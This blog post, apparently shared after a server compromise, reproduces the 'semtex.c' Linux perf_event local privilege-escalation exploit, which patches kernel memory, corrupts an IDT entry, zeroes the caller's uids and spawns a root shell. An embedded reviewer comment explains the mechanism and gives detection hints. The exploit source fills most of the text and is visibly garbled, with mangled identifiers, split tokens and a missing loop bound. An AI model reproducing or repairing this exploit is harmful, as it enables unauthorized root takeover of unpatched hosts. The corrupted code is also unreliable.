CentOS 6.4 / Linux kernel 2.6.32 x86_64 local privilege-escalation exploit code
Jincon posted on 2014-05-31 08:25:00 Posted in: Code audits
Recently I took over a CentOS server that had been compromised; the attacker went straight to root. From the analysis, the path appears to have been a MySQL foothold followed by a local privilege-escalation exploit to obtain root. The exploit is shared below for analysis.
Interested readers can test it themselves. The code is highly aggressive (it patches kernel memory); use it only for authorized security testing — you bear full responsibility for the consequences otherwise.
http://www.jincon.com/archives/187/
/*
 * REVIEWER NOTE (security): what follows is a corrupted transcription of a
 * publicly circulated Linux local privilege-escalation exploit (the "semtex.c"
 * perf_event bug). Its own header names kernels 2.6.37-3.x x86_64 and states
 * that CentOS 2.6.32 backported the bug. It is kept here for analysis only.
 *
 * The copy below does NOT compile as pasted: identifier case has been mangled
 * (Syscall/ASSERT/Return/Break/Kbase vs kbase), whitespace was inserted inside
 * tokens ("< string.h>", "#define AB (x)", "= =", "J + +", "UIn t64_t"),
 * "&current[i]" became "¤t[i]", "1024" became "1024x768", one loop bound is
 * missing entirely ("i < i++"), the printf() argument is garbled, and all
 * #define/#include directives are fused onto one line. Do not "repair" it by
 * guessing constants; treat it as evidence of what ran on the compromised
 * host, not as a tool.
 *
 * What the visible code does (read from the listing itself):
 *   sheep(off): invokes syscall 298 — perf_event_open on x86_64 — with an
 *     attribute buffer whose first word is {type=1, size=0x48} and whose
 *     second word (the config field, going by perf_event_attr layout) is the
 *     caller-chosen 'off'; it then closes the returned fd. Every call site
 *     passes a negative 'off', which is apparently the trigger.
 *   main(): maps a zero-filled region at BASE (0x380000000, prot 3,
 *     flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS), calls sheep(-1) and
 *     sheep(-2), then scans the region for a word that changed — i.e. it uses
 *     the out-of-bounds write to learn where the kernel write lands. It reads
 *     the IDT base with `sidt` (executable from ring 3 on these CPUs), maps an
 *     RWX region (prot 7) at a kernel-derived address, fills it with 0x90 (NOP),
 *     copies fuck() into it preceded by a 13-byte stub
 *     (0f 01 f8 = swapgs, e8 .. = call, 48 cf = iretq), patches the AB(n)
 *     placeholders inside the copy with the real uid/gid and an IDT address,
 *     issues one more sheep() call with an offset computed from the IDT base
 *     (presumably to corrupt an IDT entry), and fires it with `int $0x4`.
 *     On return it calls setuid(0) and execs /bin/bash.
 *   fuck(): the payload that runs at ring 0. Starting from its own address
 *     rounded down to 8 KiB, it walks 4000 bytes of what appears to be the
 *     task/cred area looking for the four caller uids (the AB(2..5) slots)
 *     and overwrites them with 0 (root), then writes 1s after them.
 *
 * Detection / mitigation hints grounded in this listing: an unprivileged
 * process calling perf_event_open with a huge negative config; an mmap of
 * RWX memory (prot 7, MAP_FIXED) at a fixed high address; `sidt` from user
 * space; then setuid(0) succeeding and /bin/bash spawning under a previously
 * non-root uid. The real fix is a patched kernel — the header itself notes
 * the bug was backported into the CentOS 2.6.32 series.
 */
/* * Linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6-o2 semtex.c &&./a.out * [email protected], salut! * * Update: * Seems like CentOS 2.6.32 backported the perf bug, lol. * Jewgold to 115T6JZGRVMGQ2NT1WNUA7CH1EUL9WXT2G if you insist. */#define _gnu_source 1#include <stdint.h> #include <stdio.h> #include <stdlib.h> #include < string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h > #include <assert.h> #define BASE 0x380000000#define SIZE 0x010000000#define ksize 0x2000000#define AB (x) ((UIn t64_t) ((0xababababll<<32) ^ ((uint64_t) (((x) *313337))) void fuck () {int i,j,k; uint64_t Uids[4] = {AB (2), AB (3), AB (4), AB (5)}; uint8_t *current = * (uint8_t *) ((uint64_t) UIDs) & (-8192)); uint64_t kbase = ((uint64_t) current) >>36; uint32_t *fixptr = (void*) AB (1); *fixptr =-1; for (i=0; i<4000; i+=4) {uint64_t *p = (void *) ¤t[i]; uint32_t *t = (void*) p[0]; if ((p[0]! = p[1]) | | ((p[0]>>36)! = kbase)) Continue for (j=0; j<20; J + +) {for (k = 0; k < 8; k++) if ((uint32_t*) UIDs) [k]! 
= T[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < i++) t[j+9+i] = 1; Return;next:; }}}void sheep (uint32_t off) {uint64_t buf[10] = {0x4800000001,off,0,0,0,0x300}; int FD = Syscall (298, buf, 0,-1,-1, 0); ASSERT (!close (FD));} int main () {uint64_t u,g,needle, kbase, *p; uint8_t *code; uint32_t *map, j = 5; int i; struct {uint16_t limit; uint64_t addr; } __attribute__ ((packed)) IDT; ASSERT ((map = mmap ((void*) base, SIZE, 3, 0x32, 0,0)) = = (void*) base); memset (map, 0, SIZE); Sheep (-1); Sheep (-2); for (i = 0; i < SIZE/4; i++) if (Map[i]) {assert (map[i+1]); Break } assert (I<SIZE/4); ASM ("Sidt%0": "=m" (IDT)); Kbase = idt.addr & 0xff000000; U = Getuid (); g = Getgid (); ASSERT ((code = (void*) mmap ((void*) kbase, Ksize, 7, 0x32, 0, 0))= = (void*) kbase); memset (Code, 0X90, ksize); Code + = KSIZE-1024; memcpy (Code, &fuck, 1024); memcpy (code-13, "\X0F\X01\XF8\XE8\5\0\0\0\X0F\X01\XF8\X48\XCF", printf ("2.6.37-3.x x86_64\[email protected") 2010\n ")% 27); Setresuid (U,u,u); Setresgid (G,G,G); while (j--) {needle = AB (j+1); ASSERT (P = memmem (code, 1024x768, &needle, 8)); if (!p) continue; *p = j? ((g<<32) |u):(idt.addr + 0x48); } sheep (-i + (((IDT.ADDR&0XFFFFFFFF) -0x80000000)/4) + 16); ASM ("int $0x4"); ASSERT (!setuid (0)); Return execl ("/bin/bash", "-sh", NULL);}